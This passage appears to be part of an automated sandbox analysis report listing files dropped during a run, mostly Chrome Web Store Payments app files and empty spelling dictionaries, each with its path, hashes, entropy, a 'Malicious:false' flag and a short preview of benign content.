                                                                                                                                                                SHA-512:74FD267CF7E299FB8E7054605C3F651F057F676FF865082FA24F4916755456768DB0DA62DBC515D829B48AB1F9CFC8AD3E841DCBF1F194D5CB14C5335A192A0D
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {.. "app_description": {.. "message": "Thanh to.n tr.n c.a h.ng Chrome tr.c tuy.n".. },.. "app_name": {.. "message": "Thanh to.n tr.n c.a h.ng Chrome tr.c tuy.n".. },.. "craw_app_unavailable": {.. "message": ".ng d.ng hi.n kh.ng kh. d.ng.".. },.. "craw_connect_to_network": {.. "message": "Vui l.ng k.t n.i v.i m.ng.".. },.. "iap_unavailable": {.. "message": "Thanh to.n trong .ng d.ng hi.n kh.ng kh. d.ng.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Vui l.ng ..ng nh.p v.o Chrome.".. }..}..
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_808020679\CRX_INSTALL\_locales\zh_CN\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):595
                                                                                                                                                                Entropy (8bit):5.210259193489374
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:1HEJ01GG01+WYpU34zeHz+dgfO8ZpU34YKiO03OyZnLAOfTYB6U:1HEpIWYpISv8Zp+JOGAOfa6U
                                                                                                                                                                MD5:BB73BF561BB79F89D9BF7C67C5AE5C65
                                                                                                                                                                SHA1:2FADD3A1959B29C44830033A35C637D0311A8C9C
                                                                                                                                                                SHA-256:D804F2A040D21D7511EFD5213D8E1721D64964A1A0DBB48E21622CEEDC9D967E
                                                                                                                                                                SHA-512:627D44CEF1FE5C5ABD598BD47FF5E22B9EFC1CF98DDE3868FA9E5896C134A0C9C055AC34EDDADAE56B6690E51AEA89965D38F770552A85C732CC796795DC68D2
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {.. "app_description": {.. "message": "Chrome .........".. },.. "app_name": {.. "message": "Chrome .........".. },.. "craw_app_unavailable": {.. "message": ".........".. },.. "craw_connect_to_network": {.. "message": ".......".. },.. "iap_unavailable": {.. "message": "............".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "... Chrome.".. }..}..
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_808020679\CRX_INSTALL\_locales\zh_TW\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):634
                                                                                                                                                                Entropy (8bit):5.386215984611281
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:1HEJ2j62GG2j62+WYpU34m7T+dgc8nOO8ZpU34mvIO03OyZnLAOfTYAuH:1HEuSZCWYpsStwP8ZpROGAOfCH
                                                                                                                                                                MD5:5FF50C673CC0C661D615F0CFD0E6DCA0
                                                                                                                                                                SHA1:60DFF98DEAB9C4746B288BDD9C94B3BCAE5EAA85
                                                                                                                                                                SHA-256:C6F8C640F3353A7B9B1432A0C139C1AEEC40133800E6C9B467B63991AD660308
                                                                                                                                                                SHA-512:361D62D91F4931C5F34092C9F2C6A5323D5EEB82A24E7ABE11F7817D8D66341C0ECAD4DCB4B10873920C8D6A3CC9F5704889E178EB2549001A9F62BEDF6C8019
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {.. "app_description": {.. "message": "Chrome ............".. },.. "app_name": {.. "message": "Chrome ............".. },.. "craw_app_unavailable": {.. "message": ".............".. },.. "craw_connect_to_network": {.. "message": "......".. },.. "iap_unavailable": {.. "message": "................".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "... Chrome.".. }..}..
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_808020679\CRX_INSTALL\_metadata\verified_contents.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):7780
                                                                                                                                                                Entropy (8bit):5.791315351651491
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:192:RktDNJ2UzsL5KcASyoH+CouKP/iNGRo/oRHMIT:AZQflcsU
                                                                                                                                                                MD5:0834821960CB5C6E9D477AEF649CB2E4
                                                                                                                                                                SHA1:7D25F027D7CEE9E94E9CBDEE1F9220C8D20A1588
                                                                                                                                                                SHA-256:52A24FA2FB3BCB18D9D8571AE385C4A830FF98CE4C18384D40A84EA7F6BA7F69
                                                                                                                                                                SHA-512:9AEAFC3ECE295678242D81D71804E370900A6D4C6A618C5A81CACD869B84346FEAC92189E01718A7BB5C8226E9BE88B063D2ECE7CB0C84F17BB1AF3C5B1A3FC4
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_808020679\CRX_INSTALL\craw_background.js
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with very long lines
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):544643
                                                                                                                                                                Entropy (8bit):5.385396177420207
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:6144:abyfBNC2FRdjiRXqbe5Dq31IVlMqX+wd5/CcMMJcRULt0NjyTOEzZQ+h72W3GB0n:Ft/g
                                                                                                                                                                MD5:6EEBED29E6A6301E92A9B8B347807F5F
                                                                                                                                                                SHA1:65DFB69B650560551110B33DCBA50B25E5B876DE
                                                                                                                                                                SHA-256:04CD9494B0ED83924DAD12202630B20D053D9E2819C8E826A386C814CC0A1697
                                                                                                                                                                SHA-512:FEDE6DB31F2AD242E7BC7B52A8859BA7F466A0B920A8DADCB32DCFB5B2A2742E98B767FF22E0C5BC5C11FEC021240AA9E458486C9039EB4EBE5CF6AF7BE97BF2
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: /*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var d,e=e||{};e.scope={};e.arrayIteratorImpl=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}};e.arrayIterator=function(a){return{next:e.arrayIteratorImpl(a)}};e.ASSUME_ES5=!1;e.ASSUME_NO_NATIVE_MAP=!1;e.ASSUME_NO_NATIVE_SET=!1;e.SIMPLE_FROUND_POLYFILL=!1;e.ISOLATE_POLYFILLS=!1;e.FORCE_POLYFILL_PROMISE=!1;e.FORCE_POLYFILL_PROMISE_WHEN_NO_UNHANDLED_REJECTION=!1;.e.defineProperty=e.ASSUME_ES5||"function"==typeof Object.defineProperties?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};e.getGlobal=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");};e.global=e.getGlobal(this);.e.IS_SYMBOL_NATIVE="func
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_808020679\CRX_INSTALL\craw_window.js
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with very long lines
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):261316
                                                                                                                                                                Entropy (8bit):5.444466092380538
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3072:I5vU7I6s2M9duIWFCbmYJ4tnFWdqpMad2vywhIp81QFv9F9nNsZgiDdOFlV/mZmc:I5vqFCb2p8Gx9FNNsZ9Dd/ceR
                                                                                                                                                                MD5:1709B6F00A136241185161AA3DF46A06
                                                                                                                                                                SHA1:33DA7D262FFED1A5C2D85B7390E9DBC830CBE494
                                                                                                                                                                SHA-256:5721A4B3F8E09C869A629EFFD350B51C9D46F0AC136717D4DB6265C0EE6F9AC8
                                                                                                                                                                SHA-512:26835B4C050F53AD2DDB84469DF9A84BBB2786A655AB52DFC20B54BEDCB81D1ECD789198D5B7D8B940242E5CEAC818A177444D402397AE82C203438C4B1D19CB
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: /*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var b,k=k||{};k.scope={};k.createTemplateTagFirstArg=function(a){return a.raw=a};k.createTemplateTagFirstArgWithRaw=function(a,c){a.raw=c;return a};k.arrayIteratorImpl=function(a){var c=0;return function(){return c<a.length?{done:!1,value:a[c++]}:{done:!0}}};k.arrayIterator=function(a){return{next:k.arrayIteratorImpl(a)}};k.makeIterator=function(a){var c="undefined"!=typeof Symbol&&Symbol.iterator&&a[Symbol.iterator];return c?c.call(a):k.arrayIterator(a)};.k.arrayFromIterator=function(a){for(var c,d=[];!(c=a.next()).done;)d.push(c.value);return d};k.arrayFromIterable=function(a){return a instanceof Array?a:k.arrayFromIterator(k.makeIterator(a))};k.ASSUME_ES5=!1;k.ASSUME_NO_NATIVE_MAP=!1;k.ASSUME_NO_NATIVE_SET=!1;k.SIMPLE_FROUND_POLYFILL=!1;k.ISOLATE_POLYFILLS=!1;k.FORCE_POLYFILL_PROMISE=!1;k.FORCE_POLYFILL_PROMISE_WHEN_NO_UNHANDLED_REJECTION=!1;.k.objectCreate=k.ASSUME_ES5||"function"==typeof Object.cre
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_808020679\CRX_INSTALL\css\craw_window.css
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1741
                                                                                                                                                                Entropy (8bit):4.912380256743454
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24:LalZ74H+rMwJHwIodHRmxt3jiu1iu1RDpfeWlMl548wJHwDwCapt/VMYXj8Eq27K:Z+rMm71le88S1tWYXmrVZFH
                                                                                                                                                                MD5:67BF9AABE17541852F9DDFF8245096CD
                                                                                                                                                                SHA1:A4AC74DD258E8E0689034FAA1B15A5C7C56DC3BB
                                                                                                                                                                SHA-256:10DFBD2D98950B79EE12F6B8E3885AABE31543048DE56AD4FC0A5E34D0D9D4EC
                                                                                                                                                                SHA-512:298FA132C6F122798FDB9BC6DE8024915147ADC20355B56A92F0ED9ACCE4549BE6E7F42212E07DCA166E31624D4E66E299565845D4BA1C51CA935050641B61FE
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: html, body {. margin: 0;. overflow: hidden;.}..webview {. width: 100%;. height: 100%;. min-height: 100%;. position: absolute;.}...craw_overlay {. position: absolute;.. left: 0;. top: 0;. right: 0;. bottom: 0;.. background-color: white;.. -webkit-transition: opacity 250ms linear;.. display: -webkit-flex;. -webkit-flex-direction: column;. -webkit-flex: 1 0%;. -webkit-align-items: center;. -webkit-justify-content: center;.. -webkit-app-region: drag;.}...craw_overlay img {. margin: 16px;.}..#loading_overlay {. opacity: 1;.}..#offline_overlay {. opacity: 0;. display: none;.}..#offline_overlay > img {. -webkit-filter: saturate(0%);.}..#offline_overlay > span {. font-family: 'Open Sans', 'Deja Vu Sans', Arial, sans-serif;. font-size: 15px;. line-height: 21px;. color: #8d8d8d;. display: block;.}..#loading_splash {. width: 128px;. height: 128px;.}..#drag_overlay {. position: absolute;. left: 0;. top: 0;. right: 0;. bottom: 0;. pointer-events: none;. -webkit
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_808020679\CRX_INSTALL\html\craw_window.html
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:HTML document, ASCII text
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):810
                                                                                                                                                                Entropy (8bit):4.723481385335562
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:hYenuEJIig5fRpvV4AEdN2sAAuzg/7RwQuLYpUH9KfRnQBGgZKy3QGgjPSWZDQL:hYeLJKTVNEuLAuzg/twQucpS9bj3
                                                                                                                                                                MD5:34A839BC40DEBC746BBD181D9EF9310C
                                                                                                                                                                SHA1:8B4EAA74D31EED5B0BABA3CA5460201F6B10DA46
                                                                                                                                                                SHA-256:BB8742615E4CD996AE5D0200E443AE6A6F0B473255F03AFFDB8FB4660DE4554D
                                                                                                                                                                SHA-512:EE81E5509CBC2CB2B6C834224688C1E1B1AA9AA3866C52F8EAED040D5C390653C52D8D681E2E2CF62906643962ABAC823D5B622385B983B21E0DCCAFDF281EFF
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: <!DOCTYPE html>.<html>. <head>. <link href="/css/craw_window.css" rel="stylesheet">. <script src="/craw_window.js"></script>. </head>. <body>. <webview></webview>. <div class="craw_overlay" id="loading_overlay">. <img src="/images/icon_128.png" />. <img src="/images/flapper.gif" />. </div>. <div class="craw_overlay" id="offline_overlay">. <img src="/images/icon_128.png" />. <span id="app_unavailable"></span>. <span id="connect_to_network"></span>. </div>. <div id="drag_overlay"></div>. <div id="top_bar">. <div id='close_button'>. <img src='/images/topbar_floating_button_close.png'/>. </div>. <div id='maximize_button'>. <img src='/images/topbar_floating_button_maximize.png'/>. </div>. </div>. </body>.</html>.
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_808020679\CRX_INSTALL\images\flapper.gif
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:GIF image data, version 89a, 30 x 30
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):70364
                                                                                                                                                                Entropy (8bit):7.119902236613185
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:768:g5TXOSBAqNIPmA8NcjCWdM0VFMJEwavTeElfWupav5TXg7wV+irIPny9MTVQHydi:g5KSmiIPmAhZWiMsDfWug7DmqM6HybkF
                                                                                                                                                                MD5:398ABB308EEBC355DA70BCE907B22E29
                                                                                                                                                                SHA1:CFFB77B8A1724B8F81D98C6D6AD0071D10162252
                                                                                                                                                                SHA-256:2B73533F47A99FFEA9CC405FFAFA9C4C53623F62487AEBFBA415945120B22040
                                                                                                                                                                SHA-512:FC7A56FC8A61A582161874B54ADBAD30A84840190008EDB0B6FBF84F91393CA58E988E3FE446F11A0C3C691C18249B93AEC2904B3D0C4F0857D79034F662385A
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_808020679\CRX_INSTALL\images\icon_128.png
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):4364
                                                                                                                                                                Entropy (8bit):7.915848007375225
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:96:YjlLDJjTvXUtNvX8dgb9HT6y8nviyHG5iCRYtIP:YtNTfUzvX8KM+MGRsIP
                                                                                                                                                                MD5:4DBC9F9E6F5A08D299BAC9E54DF07694
                                                                                                                                                                SHA1:BB38F5DE34B1E0BE1109220BA55271087A4D9EA5
                                                                                                                                                                SHA-256:91C2718DD23B4356D71F88F6146868369033291086DF327534546DFA459BEB0E
                                                                                                                                                                SHA-512:A5F2B1F47502836130D8083F757B7773C1E1CB36B76AD298CC29AB2B428C8002D2F15BD839838FC326DAC3681C2F48AB25A3E7631D33726C4B25E8EC14170912
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_808020679\CRX_INSTALL\images\icon_16.png
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):558
                                                                                                                                                                Entropy (8bit):7.505638146035601
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:6v/7vyVgSKYsfFzXxXsrPfA+b0YX+5IOUWCQKznuow7:6yVnKYsfFzhXsrIq0YXmgQGn6
                                                                                                                                                                MD5:FB9C46EA81AD3E456D90D58697C12C06
                                                                                                                                                                SHA1:5FC450F7D73CCFAC8F0D818CB3392BA4D91B69DE
                                                                                                                                                                SHA-256:016CA659BA080E194FBFC0929602B16506ED60AA6019FAA51410C4FD93B583E8
                                                                                                                                                                SHA-512:ADD810EE9EB7CAEC505B5FD90A1F184CE39D8F8C689DCC240F188FE353B9575489492E07D572A3B1C11A1555CE66AFCA5134903E4C1AA3D54BC7C5ED3E65B50C
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_808020679\CRX_INSTALL\images\topbar_floating_button.png
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):160
                                                                                                                                                                Entropy (8bit):5.475799237015411
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:yionv//thPl3xWrA4RthwkBDsTBZtnAkx/RPJDmV7bScsP4a9zln94FptVp:6v/lhPKM4nDspnAkZJNmgPdln2TTp
                                                                                                                                                                MD5:8803665A6328D23CC1014A7B0E9BE295
                                                                                                                                                                SHA1:9DA6EE729D5A6E9F30658B8EC954710F107A641F
                                                                                                                                                                SHA-256:D5F9234DC36E7FFA85F35B2359A4F82276F8395EFA76E4553507EA990B27FC6C
                                                                                                                                                                SHA-512:ECD9E71B8BA1ED8BD4CA5A0936CB66A83611C4ABCBDA76C250F4CDF4AD80320212E8F5EEB79A38910718F8346ECC1AD580A3FA835EC2B22BE497F36899FB5930
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_808020679\CRX_INSTALL\images\topbar_floating_button_close.png
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):252
                                                                                                                                                                Entropy (8bit):6.512071394066515
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:6:6v/lhPKM4nDsp7q1hKVlomsj9rxKNgtmN0VZ+GFYep:6v/7iMXVq1ylxemNgtmKVnYM
                                                                                                                                                                MD5:0599DFD9107C7647F27E69331B0A7D75
                                                                                                                                                                SHA1:3198C0A5F34DB67F91A0035DBC297354CBC95525
                                                                                                                                                                SHA-256:131817CD9311C03DF22D769DD2AD7FA2E6E9558863A89F7E5E1657424031A937
                                                                                                                                                                SHA-512:0076ACB9D6A886BD987876E49495038F9388B292A9EFE5C9093CCA64CA3692E3A5D24E35172C7697F6AAE34B86CA217EE59C003423E46D9499BD27EC7D77A649
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_808020679\CRX_INSTALL\images\topbar_floating_button_hover.png
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):160
                                                                                                                                                                Entropy (8bit):5.423186859407619
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:yionv//thPl3xWrA4RthwkBDsTBZtnAkx/9lVtEHxrPLyN+ltNPhv/l2up:6v/lhPKM4nDspnAkZHVtERrPLygltNPn
                                                                                                                                                                MD5:7CB6B9DC1A30F63B8BD976924B75AD96
                                                                                                                                                                SHA1:0C40B0C496D2F2B5F2021C117EC8610AC03AB469
                                                                                                                                                                SHA-256:721B7AAA9A42A54A349881615A12E3A26983ACA48E173FD2F66E66AA0D725735
                                                                                                                                                                SHA-512:4764937364E355956B242B84010AC56102536D2AACBE4227F0E88E4DE7AB468571957EA6C33012539156E5349AE4F777115615AE3361F60ADDF9CD227424F76A
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_808020679\CRX_INSTALL\images\topbar_floating_button_maximize.png
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):166
                                                                                                                                                                Entropy (8bit):5.8155898293424775
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:yionv//thPl3xWrA4RthwkBDsTBZttd//HmnFz1P/ZjXlUTqyCIc30ItK1p:6v/lhPKM4nDsptF/HOP/ZjXlUeyCo/p
                                                                                                                                                                MD5:232CE72808B60CBE0F4FA788A76523DF
                                                                                                                                                                SHA1:721A9C98C835D2CD734153BBE07833C6637ECD68
                                                                                                                                                                SHA-256:AFA4EA944CBDEC8543242E627EF46D5BFD3766DCAC664E7E50CDEEF2B352740C
                                                                                                                                                                SHA-512:4048EEA5A78DD569521C488C4CE4F7B77AC0454C92EE9107A81A1B3AF91A4EE036039AC1A0A6B8DD26B12E7F1595DB80B7FAA7B6A25D9032BF385528A81A8654
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_808020679\CRX_INSTALL\images\topbar_floating_button_pressed.png
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):160
                                                                                                                                                                Entropy (8bit):5.46068685940762
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:yionv//thPl3xWrA4RthwkBDsTBZtnAkx/9lVtEXIyN+ltN1/lsg1p:6v/lhPKM4nDspnAkZHVtEZgltN1eup
                                                                                                                                                                MD5:E0862317407F2D54C85E12945799413B
                                                                                                                                                                SHA1:FA557F8F761A04C41C9A4BA81994E43C6C275DBB
                                                                                                                                                                SHA-256:5C10CE0589EB115600F77381130B70AE0B7B3752614D86D4C89E857658AA222B
                                                                                                                                                                SHA-512:07CB69327961FD0019BEF8EF7590B5524905AC373A815F73F6D9E0B26840929F919A96CAA977D4B5656704DACD0F352D568FB3997F80EE6BB94C95B58839DBFE
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_808020679\CRX_INSTALL\manifest.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1322
                                                                                                                                                                Entropy (8bit):5.449026004350873
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24:1HEis7ViC/yox/fiqeUoLFlmF1s80FKrGfd0d3NZNZx1Fq7eY7nfj1B:WL7V2opiV1mvs8rxTZRczhB
                                                                                                                                                                MD5:01334FB9D092AF2AA46C4185E405C627
                                                                                                                                                                SHA1:47AD3C0E82362FFE5B881DF8D71D6F79AB7F5796
                                                                                                                                                                SHA-256:F52714812D68C577A445169D11E84DF6751C2D6886BC429643072BB5D61C6C27
                                                                                                                                                                SHA-512:888D96ADB7A847ABE472145258C8C46950EB2FA3BA7D596C2E90A17C8FB06FD0155C56CC8ABA5D076D89368417464BCB2D236F9E40E53241950A01F9F8ED548F
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {.. "app": {.. "background": {.. "scripts": [ "craw_background.js" ].. }.. },.. "default_locale": "en",.. "description": "__MSG_APP_DESCRIPTION__",.. "display_in_launcher": false,.. "display_in_new_tab_page": false,.. "icons": {.. "128": "images/icon_128.png",.. "16": "images/icon_16.png".. },.. "key": "MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCrKfMnLqViEyokd1wk57FxJtW2XXpGXzIHBzv9vQI/01UsuP0IV5/lj0wx7zJ/xcibUgDeIxobvv9XD+zO1MdjMWuqJFcKuSS4Suqkje6u+pMrTSGOSHq1bmBVh0kpToN8YoJs/P/yrRd7FEtAXTaFTGxQL4C385MeXSjaQfiRiQIDAQAB",.. "manifest_version": 2,.. "minimum_chrome_version": "29",.. "name": "__MSG_APP_NAME__",.. "oauth2": {.. "auto_approve": true,.. "client_id": "203784468217.apps.googleusercontent.com",.. "scopes": [ "https://www.googleapis.com/auth/sierra", "https://www.googleapis.com/auth/sierrasandbox", "https://www.googleapis.com/auth/chromewebstore", "https://www.googleapis.com/auth/chromewebstore.readonly" ].. },.
                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Spelling\en-US\default.acl
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:Little-endian UTF-16 Unicode text, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):2
                                                                                                                                                                Entropy (8bit):1.0
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:Qn:Qn
                                                                                                                                                                MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                                                                                                SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                                                                                                SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                                                                                                SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: ..
                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Spelling\en-US\default.dic
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:Little-endian UTF-16 Unicode text, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):2
                                                                                                                                                                Entropy (8bit):1.0
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:Qn:Qn
                                                                                                                                                                MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                                                                                                SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                                                                                                SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                                                                                                SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: ..
                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Spelling\en-US\default.exc
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:Little-endian UTF-16 Unicode text, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):2
                                                                                                                                                                Entropy (8bit):1.0
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:Qn:Qn
                                                                                                                                                                MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                                                                                                SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                                                                                                SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                                                                                                SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: ..
                                                                                                                                                                C:\Users\user\Documents\20210816\PowerShell_transcript.841675.bhylW44j.20210816191151.txt
                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):3501
                                                                                                                                                                Entropy (8bit):5.52545121438824
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:96:BZ/I/NG0V/ncqyo1ZosZrI/NG0V/ncqyo1ZNtU9J9J9vZl:L0V/e40V/K
                                                                                                                                                                MD5:16E115A797F1A607F50F90F1FEFE9C62
                                                                                                                                                                SHA1:5449A9971D8237CBD039BD7E368DCD83E2B86B19
                                                                                                                                                                SHA-256:E91B1A695385A6C083D1F3235B4D4C72323F01223BD05F97DC0A02A77146EA6D
